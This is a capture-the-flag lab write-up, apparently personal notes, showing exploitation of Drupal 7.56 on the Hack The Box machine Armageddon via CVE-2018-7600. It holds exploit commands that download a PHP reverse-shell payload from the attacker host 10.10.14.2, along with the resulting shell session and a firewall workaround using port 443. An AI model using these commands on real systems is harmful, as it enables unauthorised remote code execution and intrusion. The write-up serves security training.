Drupalgeddon

the target drupal instance is running the version 7.56, which is obsolete and vulnerable to [[armageddon_cve-2018-7600#cve-2018-7600|CVE-2018-7600]], A.K.A [[Armageddon_CVE-2018-7600#Exploit (Drupalgeddon)|Drupalgeddon2]]

┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "id"                                             
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-j985sLiKDI_AyUMBm2mJagMHNqPKfeYYYQXz5oxaqNM
[*] triggering exploit to execute: id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

I can confirm RCE

Fail (Possible Firewall?)

┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://$IP/ -c "curl http://10.10.14.2/shell.php -o ./shell.php"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-XCpKapWB20OUShdDvdAnIZ_nctSS0g3ZqwQPiWRSN5M
[*] Triggering exploit to execute: curl http://10.10.14.2/shell.php -o ./shell.php

Uploading the PHP payload via the [[Armageddon_CVE-2018-7600#Exploit (Drupalgeddon)|Drupalgeddon2]] exploit

I got a hit

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php

Triggering the PHP payload

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php      
<pre>DAEMONIZE: pcntl_fork() does not exists, moving on...
SOC_ERROR: 13: Permission denied
</pre>

The initial execution of the PHP payload fails with an error message, SOC_ERROR: 13: Permission denied The target system is running CentOS, which mostly comes with firewall configured. That may be the reason why I am unable to open the port 9999 to spawn a shell session as it is an unusual port declared by the system

Re-attempt (Success)

I have changed the line above to set the port to 443 for re-attempt

┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "rm ./shell.php ; curl http://10.10.14.2/shell.php -o ./shell.php"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-H60ApInSqoPo5d37W75U_SVaD3b_LZKYLwqTZOkYet8
[*] triggering exploit to execute: rm ./shell.php ; curl http://10.10.14.2/shell.php -o ./shell.php

I removed the previous payload and re-uploaded the PHP payload with an update port

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php

Triggering it

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ nnc 443 
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.233] 35982
socket: Shell has connected! PID: 4159
whoami
apache
hostname
armageddon.htb
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 821434  bytes 140243070 (133.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 816419  bytes 301827324 (287.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

It worked. I wasn’t allowed to use the port 9999 for reverse shell whereas the port 443 was okay. initial foothold established to the target system as the apache user via exploiting [[armageddon_cve-2018-7600#cve-2018-7600|CVE-2018-7600]] on the target Drupal instance

InfoSec LAB

Explorer

Armageddon_Exploitation

Drupalgeddon

Fail (Possible Firewall?)

Re-attempt (Success)

Interactive Graph View

Table of Contents

Backlinks